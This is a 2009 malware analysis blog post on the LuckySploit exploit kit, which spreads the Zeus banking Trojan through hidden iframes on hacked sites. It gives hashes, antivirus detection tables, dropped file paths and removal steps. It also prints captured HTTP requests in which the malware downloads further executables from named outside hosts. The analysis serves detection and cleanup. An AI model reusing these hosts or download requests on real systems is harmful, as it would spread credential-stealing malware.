LuckySploit – New exploit kit

In the last few days a user submitted a new sample of an exploit kit called LuckySploit. This new exploit kit (similar to EL.FIESTA Exploit Kit) is a set of .HTML files, used for spreading the malware with the method of Drive-by-Download, that are full of malicious JavaScript obfuscated (evil) code. A small part of deobfuscated js code looks like:

1
 f = "Welcome to LuckySploit:) \n ITS TOASTED";

The user has notified us that this new malicious LuckySploit kit is spreading by hidden iframes that are generally added to legitimate webpages by hackers who hacked the websites. The hidden iframe is redirecting all the users to a malicious website that hosts the kit’s exploits.

The malware was named r.exe and below there is the virus scanner report:

Report Generated 2.3.2009 at 20.04.47 (GMT 1)
Filename: r.exe
File size: 67 KB
MD5 Hash: 1ED1D899561E79488132CD59DFD2D3B4
SHA1 Hash: E0D1EE1CD5D0CC0202D1321EF4E89471A4E816E7
CRC32: 640354285
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found*
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 18 on 23

Antivirus Sig Version Result
a-squared 27/02/2009 Virus.Win32.Zbot!IK
Avira AntiVir 7.1.2.94 TR/Spy.ZBot.mtu
Avast 090228-0 Win32:Zbot-AZQ [Trj]
AVG 270.11.5/1979 Crypt.CJL
BitDefender 02/03/2009 Backdoor.Bot.80285
ClamAV 27/02/2009 –
Comodo 986 TrojWare.Win32.Spy.Zbot.~ACB
Dr.Web 02/03/2009 –
Ewido 02/03/2009 –
F-PROT 6 20090302 W32/Trojan3.ACQ
G DATA 19.3559 Trojan-Spy.Win32.Zbot.mtu A
IkarusT3 27/02/2009 Virus.Win32.Zbot
Kaspersky 02/03/2009 Trojan-Spy.Win32.Zbot.mtu
MHR (Malware Hash Registry) 02/03/2009 Virus Found – detect rate 11%
NOD32 v3 3900 Win32/Spy.Zbot.IB
Norman 2009/02/27 Trojan W32/Malware.FKHB
Panda 07/02/2009 –
QuickHeal 02 March, 2009 TrojanSpy.Zbot.mtu
Solo Antivirus 02/03/2009 Trojan.Spy.Win32.Zbot.Mtu
Sophos 02/03/2009 Troj/ZbotPP-Fam
TrendMicro 873(587300) –
VBA32 02/03/2009 Trojan-Spy.Win32.Zbot.myx
VirusBuster 10.101.27 TrojanSpy.Zbot.CXL

The malware was downloaded from a website immediately after we visited the infected webpage, Internet Explorer started to download and execute a lot of .EXE files. The malicious .html pages had some encrypted code and the evil script is using a sort of RSA encryption function.

The malware created a hidden (+H) folder in system32 that is known to be the folder of the famous -wsnpoem- Zeus Trojan used to steal bank accounts:

1
2
3
C:\WINDOWS\system32\wsnpoem\
C:\WINDOWS\system32\wsnpoem\video.dll
C:\WINDOWS\system32\wsnpoem\audio.dll

Screenshot of hidden folder

The DLL file video.dll was injected in another process named winlogon.exe, that is an important system process and cannot be terminated, as if it is terminated the operating system will crash.

After, it dropped a new file:

1
C:\Documents and Settings\user\svchost.exe

After some time more files were dropped in system32:

1
2
3
4
5
C:\Program Files\Microsoft Common\wuauclt.exe
C:\WINDOWS\system32\twex.exe
C:\WINDOWS\system32\twain32
C:\WINDOWS\system32\twain32\local.ds
C:\WINDOWS\system32\twain32\user.ds

Report Generated 2.3.2009 at 20.07.00 (GMT 1)
Filename: twex.exe
File size: 146 KB
MD5 Hash: 68E5A477204EB6E8B3DD5B6FC2824C0B
SHA1 Hash: C750CBF0C5D89D0029D5ADB3DA5C3BDD1CF0959A
CRC32: 193841038
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found*
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View
Detection Rate: 13 on 24 (54,16 %)

Antivirus Sig Version Result
a-squared 27/02/2009 –
Avira AntiVir 7.1.2.94 TR/Dropper.Gen
Avast 090228-0 Win32:Zbot-AZQ [Trj]
AVG 270.11.5/1979 Crypt.CJL
BitDefender 02/03/2009 Backdoor.Bot.80285
ClamAV 27/02/2009 –
Comodo 986 –
Dr.Web 02/03/2009 –
Ewido 02/03/2009 –
F-PROT 6 20090302 W32/Trojan3.ACQ
G DATA 19.3559 Win32:Zbot-AZQ [Trj] B
IkarusT3 27/02/2009 –
Kaspersky 02/03/2009 HEUR:Trojan.Win32.Generic
McAfee 03/02/2009 –
MHR (Malware Hash Registry) 02/03/2009 –
NOD32 v3 3900 Win32/Spy.Zbot.IB
Norman 2009/02/27 Trojan W32/Malware.FKHB
Panda 07/02/2009 –
QuickHeal 02 March, 2009 TrojanSpy.Zbot.mtu
Solo Antivirus 02/03/2009 –
Sophos 02/03/2009 Troj/ZbotPP-Fam
TrendMicro 873(587300) –
VBA32 02/03/2009 Trojan-Spy.Win32.Zbot.myx
VirusBuster 10.101.27 TrojanSpy.Zbot.CXL

The following files look like the ZeUs Trojan used to steal personal information and passwords by sending all the data to a malicious server.

1
2
3
4
C:\WINDOWS\system32\twex.exe
C:\WINDOWS\system32\twain32
C:\WINDOWS\system32\twain32\local.ds
C:\WINDOWS\system32\twain32\user.ds

This can be very dangerous as the attackers can steal your CreditCard or Bank Accounts and then they can empty your credit or even sell your account details to other people.

The file C:\WINDOWS\system32\twex.exe is hidden from explorer search. The malware created also different registry keys to be able to start everytime Windows starts. The malware started some traffic with some external websites to download new malware samples:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
GET /r.exe HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.saiprogetti.it
Connection: Keep-Alive
HTTP/1.1 200 OK</p>
 
GET /parus/ HTTP/1.1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rodexcom.org
Connection: Keep-Alive
HTTP/1.1 200 OK

How to remove this -wsnpoem- and twex.exe malware ?

1] Boot windows in SafeMode

2] Delete the malicious files

3] Delete the malicious registry keys

4] Scan your system with NoVirusThanks Malware Remover

Random Posts

Previous Posts